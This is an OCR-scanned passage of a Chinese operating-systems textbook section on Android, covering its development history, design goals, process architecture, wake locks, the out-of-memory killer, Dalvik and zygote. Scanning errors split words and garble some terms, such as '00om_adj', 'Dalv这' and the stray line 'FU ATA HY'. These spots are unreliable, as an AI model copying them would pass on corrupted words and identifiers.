Android 的 早期 开发 是 在 一 系列 按 季度 演示 的 里 程 碑 事件 之 下 进行 的 ， 这 样 做 是 为 了 推动 并 展示 持 
续 的 进展 。SDK 的 发 行 是 平台 的 首次 更 为 正式 的 发 行 。 发 行 SDK 会 要 求 把 到 发 行 时 刻 为 止 的 各 个 部 分 集 
成 在 一 起 以 支持 应 用 程序 开发 ， 把 平台 清理 干净 ， 发 布 平台 的 文档 ， 并 且 为 第 三 方 开 发 人 员 创 建 统一 的 
开发 环境 。 

此 刻 ， 开 发 工作 将 沿 着 两 个 轨道 发 展 吸收 关于 SDK 的 反馈 以 进一步 改进 并 最 终 确定 API， 以 及 完 
成 将 稳定 的 Dream 设 备 推 向 市 场所 必需 的 实现 工作 。 在 这 一 时 期 ， 发 生 过 对 SDK 的 几 次 公开 更 新 ， 这 些 
更 新 以 2008 年 8 月 发 行 的 0.9 版 告终 ， 这 一 版 包含 了 几乎 是 最 终 的 API。 

平台 本 身 经 历 了 快速 的 发 展 ， 并 且 在 2008 年 春季 焦点 转移 到 稳定 工作 之 上 ， 从 而 使 Dream 能 够 推 向 
市 场 。 此 刻 Android 包 含 了 作为 商业 产品 上 市 从 未 有 过 的 大 量 代 码 ， 完 完全 全 从 C 库 的 部 分 到 Dalvik 解 释 
器 (由 它 运行 应 用 程序 ) 、 系 统 以 及 应 用 程序 。 
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Android 还 包含 些许 以 前 从 未 想到 的 新 颖 思想 ， 并 且 它 们 如 何 能 够 取得 成 功 还 尚 不 清楚 。 所 有 这 一 
切 需要 汇集 起 来 成 为 稳定 的 产品 ， 开 发 团队 度 过 了 令 人 究 食 不 安 的 几 个 月 ， 因 为 他 们 不 知道 这 一 切 是 否 
真 的 可 以 汇集 在 一 起 并 且 按 预期 工作 。 

最 后 ， 在 2008 年 8 月 ， 软 件 稳定 下 来 并 且 做 好 了 上 市 的 准备 。 生 产 工 作 进入 工厂 并 且 开 始 烧 录 到 设 
备 上 。9 月 ，Android 1.0 在 Dream 设 备 上 发 布 ， 那 时 它 的 名 字 是 工 Mobile G1, 

3. 持续 开发 

在 Android 1.0 发 行 之 后 ， 开 发 工作 以 快速 的 步伐 持续 进行 。 在 接 下 来 的 5 年 时 间 里 ， 对 平台 大 约 有 
15 次 主要 的 更 新 ， 向 最 初 的 1.0 版 添加 了 大 量 各 种 各 样 的 新 功能 和 改进 。 

最 初 的 兼容 性 定义 文档 (compatibility definition document) 基本 上 只 允许 与 T-Mobile G1 非常 相似 
的 兼容 设备 。 在 接 下 来 的 几 年 ， 兼 容 设备 的 范围 得 到 巨大 的 扩展 。 这 一 过 程 的 关键 时 间 节 点 如 下 。 

1) 2009 年 ，Android 1.5 到 2.0 版 引入 了 软 键盘 ， 取 消 了 对 物理 键盘 的 要 求 ， 支持 范围 更 为 广泛 的 屏 
HE ( 既 包 括 大 小 也 包括 像素 密度 ) ， 包 括 低 端 的 QVGA 设备 和 新 的 大 尺寸 高 清 设 备 ， 如 WVGA Motorola 
Droid， 并 且 引 入 了 新 的 “system feature”( 系 统 特征 ) 设施 ， 使 设备 能 够 报告 它们 支持 什么 硬件 功能 ， 
应 用 程序 能 够 指示 它们 需要 哪些 硬件 功能 。system feature 设 施 是 Google Play 用 来 对 于 特定 设备 确定 其 应 
用 程序 兼容 性 的 关键 机 制 。 

2) 2011 年 ，Android 3.0 到 4.0 版 在 平台 中 引入 了 新 的 核心 支持 ， 以 支持 10 英 寸 以 及 更 大 的 平板 电 
脑 ， 核 心平 台 现 在 完全 支持 各 种 设备 屏幕 尺寸 ， 从 小 的 QVGA 手机 到 智能 手机 和 大 屏 “ 平 板 手机 "， 从 7 
英寸 平板 电脑 和 更 大 的 平板 电脑 到 超过 10 英 寸 的 平板 电脑 。 

3) 随 着 平台 对 更 多 各 种 各 样 的 硬件 提供 内 置 的 支持 ， 出 现 了 更 多 类 型 的 Android 设 备 ， 不 但 有 更 大 
的 屏幕 ， 而 且 还 有 带 鼠 标 或 不 带 鼠 标的 非 触摸 设备 ， 其 中 包括 TV 设备 (如 Google TV)、 游 戏 设备 、 笔 
记 本 电脑 、 照 相机 等 。 

重要 的 开发 工作 还 进入 了 看 不 见 的 领域 ，Google 拥 有 专利 的 服务 从 Google 开 源 平台 中 更 加 清晰 地 分 
离 出 来 。 

就 Android 1.0 而 言 ， 重 要 的 工作 投入 到 了 获得 清晰 的 第 三 方 应 用 程序 API 和 不 依赖 于 拥有 专利 的 
Google 代 码 的 开源 平台 之 中 。 然 而 ，Google 专 利 代 码 的 实现 常常 还 没有 清理 干净 ， 这 样 就 依赖 于 平台 的 
内 部 成 分 。 平 台 时 常 甚至 还 不 具备 Google 专 利 代 码 所 需要 的 设施 ， 以 便 使 它们 很 好 地 集成 在 一 起 。 为 解 
决 这 些 问题 ，Google 开 展 了 一 系列 项 目 : 

1) 2009 年 ，Android 2.0 版 引入 了 一 种 体系 结构 ， 使 第 三 方 能 够 将 他 们 自己 的 同步 适配器 插入 平台 
API (如 通讯 录 数 据 库 )。Google 用 于 同步 各 种 数据 的 代码 迁移 到 这 个 定义 明确 的 SDK API, 

2) 2010 年 ，Android 2.2 版 包含 了 Google 专 利 代码 的 内 部 设计 与 实现 工作 。 这 个 “伟大 的 解 绑 ” 干 
净 地 实现 了 许多 核心 Google 服 务 ， 从 交付 基于 云 的 系统 软件 更 新 ， 到 “ 云 到 设备 的 信息 发 送 ” 和 其 他 背 
景 服务 ， 这 样 一 来 它们 就 能 够 单独 地 从 平台 得 到 交付 和 更 新 。 

3) 2012 年 ， 新 的 Google Play 服务 应 用 程序 交付 到 设备 中 ， 它 包含 了 最 新 的 功能 ， 可 用 于 Google 拥 
有 专利 的 非 应 用 程序 服务 。 这 是 2010 年 解 绑 工 作 的 自然 结果 ， 使 得 诸如 云 到 设备 的 信息 发 送 和 地 图 等 具 
有 专利 的 API 能 够 通过 Google 完 全 得 到 交付 和 更 新 。 

10.8.3 设计 目标 

Android 平 台 的 一 些 关 键 设 计 目 标 在 其 开发 过 程 中 逐步 演化 : 

1) 为 移动 设备 提供 完全 开源 的 平台 。Android 的 开源 部 分 是 一 个 自 下 而 上 的 操作 系统 栈 ， 包 含 各 种 
应 用 程序 ， 能 够 作为 完整 的 产品 上 市 。 

2) 通过 健壮 的 和 稳定 的 API 强 有 力 地 支持 具有 专利 的 第 三 方 应 用 。 正 如 前 面 所 讨论 的 ， 维 护 一 个 平 
台 真 正 开源 的 同时 使 具有 专利 的 第 三 方 应 用 足够 稳定 是 一 个 挑战 。Android 采 用 了 一 种 混合 技术 解决 方 
案 (具体 说 明定 义 明确 的 SDK 并 且 在 公开 的 API 和 内 部 实现 之 间 进 行 分 隔 ) 和 策略 必要 条 件 (通过 CDD) 
来 解决 这 一 问题 。 

3) 允许 全 部 第 三 方 应 用 程序 (包括 来 自 Google 的 )， 从 而 在 公平 的 环境 中 进行 竞争 。Android 开 源 代 
码 被 设计 成 对 于 建立 在 其 上 的 高 级 系统 功能 尽 可 能 保持 中 立 ， 这 些 高 级 系统 功能 从 云 服 务 (例如 数据 同 
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步 或 云 到 设备 的 信息 发 送 API) 到 库 (例如 Google 的 地 图 库 ) 和 诸如 应 用 程序 商店 一 类 的 丰富 的 服务 。 

4) 提供 一 种 应 用 程序 安全 性 模型 ， 在 该 模型 中 用 户 不 必 深 度 信赖 第 三 方 应 用 程序 。 操 作 系 统 必须 保 
护 用 户 免 受 应 用 程序 不 端 行为 的 危害 ， 这 不 但 包括 可 能 导致 系统 崩溃 的 有 缺陷 的 应 用 程序 ， 而 且 还 包括 
更 为 微妙 的 对 设备 和 用 户 数据 的 不 当 使 用 。 用 户 越 不 需要 信任 应 用 程序 ， 他 们 就 越 拥 有 自由 来 尝试 和 安 
装 这 些 应 用 程序 。 

5) 支持 典型 的 移动 用 户 界面 : 使 用 户 在 许多 应 用 中 花费 少量 的 时 间 。 移 动 体验 趋向 于 与 应 用 程序 进 
行 短暂 的 交互 : 看 一 眼 新 收 到 的 电子 邮件 ， 接 收 或 者 发 送 一 条 SMS 信 息 或 者 IM， 进 入 通讯 录 拨 打 一 个 电 
话 ， 等 等 。 系 统 需 要 对 这 些 情况 进行 优化 ， 以 期 获得 快速 的 应 用 启动 和 切换 时 间 。Android 的 目标 一 般 
是 用 200ms 冷 启动 一 个 基本 的 应 用 程序 到 显示 完整 的 交互 式 UI。 

6) 为 用 户 管理 应 用 程序 进程 ， 简 化 围绕 应 用 程序 的 用 户 体验 ， 从 而 使 用 户 在 使 用 完 应 用 程序 之 后 不 
用 想 着 要 将 其 关闭 。 移 动 设备 还 趋向 于 在 没有 交换 空间 的 条 件 下 运行 ， 交 换 空间 能 够 在 当前 运行 的 应 用 
程序 需要 的 RAM 多 于 物理 上 可 用 的 RAM 之 时 ， 使 操作 系统 衰退 得 更 加 优雅 。 为 了 处 理 这 两 个 需求 ， 系 
统 需要 采取 更 加 积极 主动 的 态度 来 管理 进程 ， 决 定 何 时 应 该 启动 和 停止 它们 。 

7) 鼓励 应 用 程序 以 丰富 和 安全 的 方式 互 操作 和 协作 ,移动 应 用 程序 是 以 某 种 方式 返回 到 shell 命 令 的 : 
它们 不 是 像 桌面 应 用 程序 那样 越 来 越 大 的 单一 设计 ， 而 是 瞄准 并 聚焦 于 特定 的 需求 。 为 帮助 支持 这 一 点 ， 
操作 系统 需要 为 这 些 应 用 程序 提供 新 型 的 设施 ， 使 它们 共同 协作 以 创建 更 大 的 整体 。 

8) 创建 一 个 完全 通用 的 操作 系统 。 移 动 设备 是 通用 计算 的 一 种 新 的 表现 ， 而 不 是 对 传统 桌面 操作 系 
统 的 简化 。Android 的 设计 应 该 足够 丰富 ， 从 而 使 它 至 少 能 够 像 传统 操作 系统 一 样 不 断 成 长 。 


10.8.4 Android 体系 结构 

Android 建 立 在 标准 Linux 内 核 之 上 ， 对 内 核 本 身 只 有 少量 重要 的 扩展 ,我 们 将 在 后 面 对 此 进行 讨论 。 
然而 ， 一 旦 进入 用 户 空 间 ，Android 的 实现 与 传统 的 Linux 发 行 版 具有 相当 大 的 不 同 ， 并 且 以 非常 不 一 样 
的 方式 使 用 你 已 经 了 解 的 Linux 功 能 特性 。 

如 同 传统 的 Linux 系 统一 样 ，Android 的 第 一 个 用 户 空间 进程 是 init， 它 是 所 有 其 他 进程 的 根 。 然 而 ， 
Android 的 init 启 动 的 守护 进程 是 不 同 的 ， 这 些 守 护 进程 更 多 地 聚焦 于 底层 细节 (管理 文件 系统 和 硬件 访 
问 )， 而 不 是 高 层 用 户 设施 ， 例 如 调度 定时 任务 (cron jobs)。Android 还 有 一 层 额外 的 进程 ， 它 们 运行 
Dalvik 的 Java 语 言 环 境 ， 负 责 执行 系统 中 所 有 以 Java 实 现 的 部 分 。 

图 10-39 显 示 了 Android 的 基本 进程 结构 。 首 先是 init 进 程 ， 它 产生 了 一 些 底 层 守 护 进程 。 其 中 一 个 
守护 进程 是 zygote， 它 是 高 级 Java 语 言 进程 的 根 。 
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图 10-39 Android 进 程 层 次 结构 
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Android 的 init 不 以 传统 的 方法 运行 shell ， 因 为 典型 的 Android 设 备 没 有 本 地 控制 台 用 于 shell 访 问 。 
作为 替代 ， 系 统 进程 adbd 监 听 请 求 shell 访 问 的 远程 连接 (例如 通过 USB ) ， 按 要 求 为 它们 创建 shell 进 程 。 

因为 Android 大 部 分 是 用 Java 语 言 编写 的 ， 所 以 zygote 守 护 进程 以 及 由 它 启 动 的 进程 是 系统 的 中 心 。 
由 zygote 启 动 的 第 一 个 进程 称 为 system_server， 它 包含 全 部 核心 操作 系统 服务 ， 其 关键 部 分 是 电源 管理 、 
包 管 理 、 窗 口 管理 和 活动 管理 。 

其 他 进程 在 需要 的 时 候 由 zygote 创 建 。 这 些 进程 中 有 一 些 是 “持久 的 ”进程 ， 它 们 是 基本 操作 系统 
的 组 成 部 分 ， 例 如 phone 进 程 中 的 电话 栈 ， 它 必须 保持 始终 运行 。 另 外 的 应 用 程序 进程 将 在 系统 运行 的 
过 程 中 按 需 创建 和 终止 。 

应 用 程序 通过 调用 操作 系统 提供 的 库 与 操作 系统 进行 交互 ， 这 些 库 合 起 来 构成 Android 框 架 
(Android framework) 。 这 些 库 中 有 一 些 可 以 在 进程 内 部 执行 其 工作 ， 但 是 许多 库 需要 与 其 他 进程 执行 进 
程 间 通信 ， 这 通常 是 在 system_server 进 程 中 提供 服务 的 。 

图 10-40 显 示 了 典型 的 Android 框 架 API 设 计 ， 这 样 的 API 要 与 系统 服务 进行 交互 ， 在 本 例 中 是 
package manager ( 包 管 理 器 ) 。 包 管理 器 提供 了 一 个 框架 API， 供 应 用 程序 在 其 本 地 进程 中 调用 ， 此 处 
API 是 PackageManager 类 。 在 内 部 ，PackageManager 类 必须 获得 与 system_server 中 相应 服务 的 连接 。 为 
达到 这 一 目的 ， 在 引导 之 时 system_server 在 service manager (服务 管理 器 ) 中 一 个 明确 定义 的 名 字 之 下 
发 布 每 一 个 服务 service manager 是 由 init 启 动 的 一 个 守护 进程 。 应 用 程序 中 的 PackageManager 从 service 
manager 中 检索 一 个 连接 ， 并 使 用 相同 的 名 字 连 接 到 其 系统 服务 。 

一 旦 PackageManager 与 其 系统 服务 建立 了 连接 ， 它 就 可 以 向 其 发 出 调用 。 大 多 数 对 PackageManager 
的 调用 是 通过 使 用 Android 的 Binder IPC 制 作为 进程 间 通 信 而 实现 的 ， 在 本 例 中 是 调用 system_server 中 的 
PackageManagerService 实 现 。PackageManagerService 的 实现 对 所 有 客户 应 用 程序 之 间 的 交互 活动 进行 
仲裁 ， 并 且 维 护 多 个 应 用 程序 所 需要 的 状态 。 


应 用 程序 进程 Android 系统 服务 器 
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服务 管理 器 
图 10-40 发 布 并 且 与 系统 服务 交互 


10.8.5 Linux 扩展 
就 大 部 分 而 言 ，Android 包 含 一 个 常备 的 Linux 内 核 ， 提 供 标准 的 Linux 功 能 特性 。Android 作 为 一 个 
操作 系统 ， 其 许多 令 人 感 兴趣 的 方面 在 于 这 些 现 有 的 Linux 功 能 特性 是 如 何 使 用 的 。 然 而 ， 也 存在 若干 
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对 Linux 的 重要 扩展 ，Android 系 统 有 赖 于 此 。 

1. 唤醒 锁 

移动 设备 上 的 电源 管理 不 同 于 传统 的 计算 机 系统 ， 所 以 ， 为 了 管理 系统 如 何 进入 睡眠 ，Android 为 
Linux 添 加 了 一 个 新 的 功能 ， 称 为 唤醒 锁 (wake lock), ， 也 称 为 悬 停 阻止 器 (suspend blocker), 

在 传统 的 计算 机 系统 上 ， 系 统 可 以 处 于 两 种 电源 状态 之 一 : 运行 并 且 准 备 好 处 理 用 户 输入 ， 或 者 深 
度 睡 虐 ， 并 且 如 果 没 有 诸如 按 下 电源 键 一 类 的 外 部 中 断 就 不 能 继续 执行 。 在 运行 的 时 候 ， 次 要 的 硬件 设 
备 可 以 按 需 要 通电 或 者 断 电 ,但 是 CPU 本 身 以 及 核心 硬件 部 件 必须 保持 通电 状态 以 处 理 到 来 的 网 络 通信 
以 及 其 他 类 似 的 事件 。 进 入 低能 耗 睡眠 状态 是 发 生得 比较 少 的 事情 : 或 者 通过 用 户 明确 地 让 系统 睡眠 ， 
或 者 由 于 比较 长 的 时 间 间 隔 没 有 用 户 活动 ， 从 而 系统 自身 进入 睡眠 。 从 这 样 的 睡眠 状态 醒 来 需要 来 自 外 
部 源 的 硬件 中 断 ， 例 如 按 下 键盘 上 的 一 个 按键 ， 在 此 刻 设备 将 醒 来 并 且 点 亮 屏幕 。 

移动 设备 的 用 户 具 有 不 同 的 期 望 。 尽 管用 户 可 以 关闭 屏幕 ， 在 这 样 的 情况 下 看 起 来 好 像 是 让 设备 睡 
眼 了 ,但 是 传统 的 睡眠 状态 实际 上 并 不 是 用 户 想 得 到 的 。 当 设备 的 屏幕 关闭 之 时 ， 设 备 仍然 需要 工作 : 
它 需 要 能 够 接听 电话 呼叫 ， 接 收 并 处 理 到 来 的 聊天 消息 数据 ， 以 及 许多 其 他 事情 。 

对 于 移动 设备 ， 关 于 打开 和 关闭 设备 屏幕 的 期 望 同样 比 传统 的 计算 机 具有 更 高 的 要 求 。 移 动 交互 趋 
向 于 在 一 整 天 中 有 许多 次 短 时 的 突 发 : 你 收 到 一 条 消息 并 且 打 开设 备查 看 ， 或 许 还 要 发 送 一 句 回复 ， 
你 碰见 一 个 朋友 牵 着 狗 在 散步 ， 并 且 打 开设 备 为 她 拍 了 一 张 照片 。 在 这 类 典型 的 移动 应 用 中 ， 人 恢复 设备 
直到 它 能 够 使 用 的 任何 延迟 都 会 对 用 户 体验 造成 严重 的 负面 影响 。 

给 定 了 这 样 的 需求 ， 一 种 解决 方案 或 许 仅仅 是 当 设备 的 屏幕 关闭 之 时 不 让 CPU 隆 眼 ， 这 样 它 就 总 是 
准备 好 再 次 重新 打开 。 归 根 到 底 ， 内 核 了 解 什么 时 候 线 程 无 需 工 作 调 度 ， 并 且 Linux (以 及 大 多 数 操作 
系统 ) 将 会 自动 地 让 CPU 空闲 ， 在 这 样 的 情况 下 使 用 较 低 的 电能 。 

然而 ， 空 闲 的 CPU 与 真正 的 睡眠 是 不 同 的 。 例 如 ; 

1) 在 许多 芯片 组 上 ， 空 闲 状 态 使 用 的 电能 比 真正 的 睡眠 状态 要 多 得 多 。 

2) 空闲 的 CPU 可 以 在 任何 时 刻 唤醒 ， 只 要 某 些 工作 赶 巧 变 得 可 用 ， 即 使 该 工作 是 不 重要 的 。 

3) 只 是 让 CPU 空闲 并 不 意味 着 可 以 关闭 其 他 硬件 ， 而 这 样 的 硬件 在 真正 的 睡眠 中 是 不 需要 的 。 

Android 上 的 唤醒 锁 人 允许 系统 进入 深度 睡眠 模式 ， 而 不 必 与 一 个 明确 的 用 户 活动 (例如 关闭 屏幕 ) 
绑 在 一 起 。 具 有 唤醒 锁 的 系统 的 默认 状态 是 睡眠 状态 。 当 设备 在 运行 时 ， 为 了 保持 它 不 回 到 睡眠 ， 则 需 
要 持 有 一 个 唤醒 锁 。 

当 屏幕 打 开 时 ， 系 统 总 是 持 有 一 个 唤醒 锁 ， 这 样 就 阻止 了 设备 进入 睡眠 ， 所 以 它 将 保持 运行 ， 正 如 
FU ATA HY 

然而 ， 在 屏幕 关闭 时 ， 系 统 本 身 一 般 并 不 持 有 唤醒 锁 ， 所 以 只 有 在 某 些 其 他 实体 持 有 唤醒 锁 的 条 件 
下 才能 保持 系统 不 进入 睡眠 。 当 没有 唤醒 锁 被 持 有 时 ， 系 统 进 入 睡眠 ， 并 且 只 能 由 于 硬件 中 断 才 能 将 其 
从 睡眠 中 唤醒 。 

一 旦 系统 已 经 进入 睡 卢 ， 硬 件 中 断 可 以 将 其 再 次 唤醒 ， 如 同 在 传统 操作 系统 中 那样 。 这 样 的 中 断 源 
有 基于 时 间 的 警报 、 来 自 蜂窝 无 线 电 的 事件 (例如 呼 人 的 呼叫 )、 到 来 的 网 络 通信 以 及 按 下 特定 的 硬件 
按钮 (例如 电源 按钮 )。 针 对 这 些 事件 的 中 断 处 理 程序 要 求 对 标准 Linux 做 出 一 个 改变 ， 在 处 理 完 中 断 之 
后 ， 它 们 需要 获得 一 个 初始 的 唤醒 锁 从 而 使 系统 保持 运行 。 

中 断 处 理 程序 获得 的 唤醒 锁 必 须 持 有 足够 长 的 时 间 ， 以 便 能 够 沿 着 栈 向 上 将 控制 传递 给 内 核 中 的 驱 
动 程序 ， 由 其 继续 对 事件 进行 处 理 。 然 后 ， 内 核 驱 动 程序 负责 获得 自己 的 唤醒 锁 ， 在 此 之 后 ， 中 断 唤 醒 
锁 可 以 安全 地 得 到 释放 而 不 存在 系统 进入 睡眠 的 风险 。 

如 果 在 这 之 后 驱动 程序 将 该 事件 向 上 传送 到 用 户 空间 ， 则 需要 类 似 的 担 手 。 驱 动 程序 必须 确保 继续 
持 有 唤醒 锁 直 到 它 将 事件 传递 给 等 待 的 用 户 进程 , 并 且 要 确保 存在 使 用 户 进程 获得 自己 的 唤醒 锁 的 条 件 。 
这 一 流程 可 能 还 会 在 用 户 空间 的 子 系统 之 间 继 续 ， 只 要 某 个 实体 持 有 唤醒 锁 ， 我 们 就 继续 执行 想 要 的 处 
理 以 便 响 应 事件 。 然 而 ， 一 旦 没有 唤醒 锁 被 持 有 ， 整 个 系统 将 返回 睡眠 并 且 所 有 进程 停止 。 

2. 内 存 不 足 杀手 

Linux 中 的 “内 存 不 足 杀 手 ” (out-of-memory Killer) 试图 在 内 存 极 低 时 进行 恢复 。 在 现代 操作 系统 
上 内 存 不 足 的 情况 是 模糊 的 事情 。 由 于 有 分 页 和 交换 ， 应 用 程序 本 身 很 难看 到 内 存 不 足 的 错误 。 然 而 ， 
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内 核 仍然 可 能 进入 这 样 一 种 情形 ， 当 需要 的 时 候 找 不 到 可 用 的 RAM 页 面 ， 不 但 对 新 的 分 配 会 这 样 ， 而 
且 在 换 入 或 者 分 页 入 某 些 正在 使 用 的 地 址 范围 时 也 可 能 如 此 。 

在 这 样 的 低 内 存 情形 中 ， 标 准 的 Linux 内 存 不 足 杀 手 是 最 后 的 应 急 手段 ， 它 试图 找到 RAM， 使 得 内 
核能 够 继续 处 理 它 正在 做 的 事情 。 做 法 是 为 每 个 进程 分 配 一 个 “ 坏 度 ”(badness) 水 平 ， 并 且 简 单 地 杀 
死 最 坏 的 进程 。 进 程 的 坏 度 基于 进程 正在 使 用 的 RAM 数 量 、 它 已 经 运行 了 多 长 时 间 以 及 其 他 因素 ， 目 
标 是 杀 死 大 量 但 愿 不 太 重 要 的 进程 。 

Android 为 内 存 不 足 杀手 施加 了 特别 的 压力 。 它 没有 交换 空间 ， 所 以 它 处 于 内 存 不 足 情形 会 更 为 常 
见 : 除非 通过 放弃 从 最 近 使 用 的 存储 器 映射 的 干净 的 RAM 页 面 ， 否 则 没有 办 法 缓解 内 存 压力 。 即 便 如 
此 ，Android 还 是 使 用 标准 Linux 的 配置 ， 过 度 提交 (over-commit) 内 存 ， 也 就 是 说 ， 人 允许 在 RAM 中 分 
配 地 址 空间 而 无 需 保证 有 可 用 的 RAM 对 其 提供 后 备 。 过 度 提 交 对 于 优化 内 存 使 用 是 一 个 极其 重要 的 工 
具 ， 这 是 因为 mmap 大 文件 (例如 可 执行 文件 ) 是 很 常见 的 ， 此 处 你 只 需要 将 该 文件 中 全 部 数据 的 一 小 
部 分 装 入 RAM。 

考虑 到 这 样 的 情形 ， 常 备 的 Linux 内 存 不 足 杀 手工 作 得 不 太 好 ， 因 为 它 更 多 地 被 预定 为 最 后 的 应 急 
手段 ,并且 很 难 正确 地 识别 合理 的 进程 来 杀 死 。 事 实 上 ， 正 如 我 们 在 后 面 要 讨论 的 ，Android 广 泛 地 依 
赖 定期 运行 内 存 不 足 杀 手 以 收割 (reap) 进程 ， 并 且 对 于 选择 哪个 进程 的 问题 做 出 好 的 选择 。 

为 解决 这 一 问题 ，Android 为 内 核 引 入 了 自己 的 内 存 不 足 杀 手 ， 具 有 不 同 的 语义 和 设计 目标 。 
Android 的 内 存 不 足 杀 手 和 运行 得 更 加 积极 进取 : 只 要 RAM 变 “ 低 ” 则 运行 。 低 的 RAM 是 由 一 个 可 调整 的 
参数 标识 的 ， 该 参数 指示 在 内 核 中 有 多 少 空闲 的 和 缓存 的 RAM 是 可 接受 的 。 当 系统 变 得 低 于 这 个 极限 
时 ， 内 存 不 足 杀 手 便 运行 以 便 从 别处 释放 RAM。 目 标 是 确保 系统 绝 不 会 进入 坏 的 分 页 状态 ， 当 前 台 应 
用 程序 竞争 RAM 时 坏 的 分 页 状态 会 对 用 户 体验 造成 负面 影响 ， 因 为 页 面 不 断 地 换 入 换 出 会 导致 应 用 程 
序 的 执行 变 得 非常 缓慢 。 

与 试图 猜测 哪个 进程 应 该 被 杀 死 不 同 ，Android 的 内 存 不 足 杀 手 非 常 严 格 地 依赖 由 用 户 空间 提供 给 
它 的 信息 。 传 统 的 Linux 内 存 不 足 杀手 具有 每 个 进程 的 00om_adj 参 数 ， 通 过 修改 进程 的 总 体 坏 度 得 分 ， 该 
参数 可 用 来 指导 选择 最 佳 的 进程 并 将 其 杀 死 。Android 的 内 存 不 足 杀 手 使 用 这 个 相同 的 参数 ， 但 是 具有 
严格 的 顺序 : 具有 较 高 oom_adj 的 进程 总 是 在 那些 具有 较 低 oom_adj 的 进程 之 前 被 杀 死 。 我 们 将 在 后 面 讨 
论 Android 系 统 如 何 分 配 这 样 的 得 分 。 

10.8.6 Dalvik 

Dalvik 在 Android 上 实现 了 Java 语 言 环 境 ， 它 负责 运行 应 用 程序 以 及 大 部 分 系统 代码 。system_ 
service 进 程 中 的 几乎 一 切 一 一 从 包 管 理 器 (package manager) ， 到 窗口 管理 器 (window manager) ， 再 到 
活动 管理 器 (activity manager) 一 一 都 是 由 Dalvik 执 行 的 Java 语 言 代 码 实现 的 。 

然而 ，Android 并 不 是 传统 意义 上 的 Java 语 言 平台 。Android 应 用 程序 中 的 Java 代 码 是 由 Dalvik 的 字 
节 代 码 格式 提供 的 ， 这 是 基于 寄存 器 机 器 的 字 节 代码 ， 而 不 是 传统 的 基于 栈 的 字 节 代码 。Dalvik 的 字 节 
代码 格式 允许 更 快 的 解释 ， 与 此 同时 仍然 支持 JIT (Just-In-Time， 及 时 ) 编译 。 通 过 使 用 串 共 用 和 其 他 
技术 ，Dalvik 字 节 代 码 还 更 加 节省 空间 ， 无 论 是 在 磁盘 上 还 是 在 RAM 中 。 

编写 Java 应 用 程序 时 ， 源 代码 是 用 Java 编 写 的 ， 然 后 使 用 传统 的 Java 工 具 将 其 编译 成 标准 Java 字 节 
代码 。 在 此 之 后 ，Android 引 入 了 一 个 新 的 步骤 :将 Java 字 节 代 码 转换 成 Dalvik 的 更 加 紧凑 的 字 节 代码 表 
示 。 应 用 程序 的 Dalv 这 字 节 代码 版 本 封装 成 最 后 的 应 用 程序 二 进 制 文件 ， 并 且 最 终 安装 在 设备 上 。 

Android 的 系统 体系 结构 高 度 依赖 Linux 的 系统 原 语 ， 包 括 内 存 管 理 、 安 全 以 及 跨 安全 边界 的 通信 。 
对 于 核心 操作 系统 概念 ，Android 并 不 使 用 Java 语 言 ， 以 此 试图 将 底层 Linux 操 作 系 统 这 些 重要 的 部 分 加 
以 抽象 。 

特别 值得 注意 的 是 Android 对 于 进程 的 使 用 。Android 的 设计 并 不 依赖 Java 语 言 将 应 用 程序 与 系统 相 
隔离 ， 相 反 ， 它 采取 传统 的 操作 系统 方法 进行 进程 隔离 。 这 意味 着 ， 每 个 应 用 程序 运行 在 自己 的 Linux 
进程 中 ， 具 有 自己 的 Dalvik 环 境 ，system_server 和 平台 的 其 他 核心 部 分 就 是 用 Java 编 写 的 。 

使 用 进程 进行 这 样 的 隔离 使 得 Android 能 够 借 力 于 Linux 的 功能 特性 来 管理 进程 ， 从 内 存 隔离 到 当 进 
程 结 束 时 清除 与 进程 相关 的 所 有 资源 ， 都 是 如 此 。 除 了 进程 以 外 ，Android 还 排他 地 依赖 于 Linux 的 安全 
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特性 ， 而 不 是 使 用 Java 的 SecurityManager 体 系 结构 。 

Linux 进 程 和 安全 的 应 用 大 大 简化 了 Dalvik 环 境 ， 因 为 它 不 再 需要 负责 系统 稳定 性 和 健壮 性 这 些 关 
键 的 方面 。 并 非 偶然 地 ， 它 还 允许 应 用 程序 在 它们 的 实现 中 自由 地 使 用 本 机 代码 ， 这 对 于 游戏 特别 重要 ， 
因为 游戏 通常 建立 在 基于 C++ 的 引擎 之 上 。 

像 这 般 混 合 进程 和 Java 语 言 确 实 引 入 了 某 些 挑战 。 即 便 在 现代 移动 硬件 之 上 ， 也 需要 花费 一 秒 钟 启 
动 全 新 的 Java 语 言 环 境 。 请 记 住 Android 的 设计 目标 之 一 ， 是 能 够 以 200ms 为 目标 快速 启动 应 用 程序 。 要 
求 为 新 的 应 用 程序 启动 全 新 的 Dalvik 进 程 将 会 大 大 超出 预算 。 就 算是 不 需要 初始 化 一 个 新 的 Java 语 言 环 
境 ，200ms 启 动 在 移动 硬件 上 也 很 难 达 到 。 

这 一 问题 的 答案 是 我 们 在 前 面 简要 提 及 的 zygote 本 机 守护 进程 。zygote 负 责 启 动 并 初始 化 Dalvik 到 
一 个 阶段 ， 在 此 处 已 做 好 准备 开始 运行 用 Java 写 的 系统 或 应 用 程序 代码 。 所 有 基于 Dalvik 的 新 进程 ( 系 
统 或 应 用 程序 ) 都 是 从 zygote 创 建 的 ， 使 得 它们 能 够 在 环境 已 经 准备 就 绪 的 条 件 下 开始 执行 。 

由 zygote 启 动 的 不 仅仅 是 Dalvik。zygote 还 预 装载 了 Android 框 架 的 许多 部 分 ， 这 些 部 分 对 于 系统 和 
应 用 程序 而 言 是 公共 的 ， 并 且 zygote 还 装载 了 经 常 需要 使 用 的 资源 和 其 他 东西 。 

注意 ， 从 zygote 创 建新 进程 涉及 Linux 的 fork， 但 是 不 存在 exec 调 用 。 新 进程 是 最 初 zygote 进 程 的 复 
制品 ， 拥 有 已 经 建立 好 的 所 有 预 初始 化 状态 ， 并 且 做 好 了 运行 的 准备 。 图 10-41 显 示 了 新 的 Java 应 用 程序 
进程 是 如 何 与 最 初 的 zygote 进 程 相 联系 的 。 调 用 fork 之 后 ， 新 进程 有 了 自己 单独 的 Dalvik 环 境 ， 只 是 它 与 
zygote 通 过 写 时 复制 页 面 共享 预 装载 和 初始 化 的 数据 。 现 在 ， 让 新 的 可 运行 进程 准备 就 绪 所 剩 下 的 所 有 
事情 是 给 它 一 个 正确 的 标识 (UID 等 )， 完 成 Dalvik 启 动 线程 所 需要 的 初始 化 工作 ， 以 及 装载 要 运行 的 应 
用 程序 或 系统 代码 。 


Zygote 





图 10-41 从 zygote 创 建新 的 Dalvik 进 程 


